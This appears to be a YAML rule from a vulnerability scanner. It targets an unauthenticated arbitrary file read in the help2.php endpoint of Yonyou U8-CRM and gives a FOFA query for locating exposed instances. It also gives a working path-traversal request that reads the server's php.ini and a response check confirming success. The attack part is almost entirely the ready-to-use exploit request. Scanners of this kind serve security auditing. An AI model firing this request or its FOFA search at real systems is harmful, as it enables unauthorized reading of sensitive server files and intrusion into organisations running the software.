product: 用友U8-CRM
vName: 用友U8-CRM help2.php任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友U8-CRM系统在help2.php接口处存在任意文件读取漏洞，未授权的攻击者可以通过此漏洞读取服务器上的敏感文件
version: ''
note: ''
search:
  FOFA: app="用友U8CRM"
protocol: http
link: https://blog.csdn.net/luochen2436/article/details/135087159
fix:
  - 临时缓解措施：在防火墙上设置访问策略，不允许任何人访问该路径
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /pub/help2.php?key=/../../apache/php.ini
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - About php.ini
            logic: and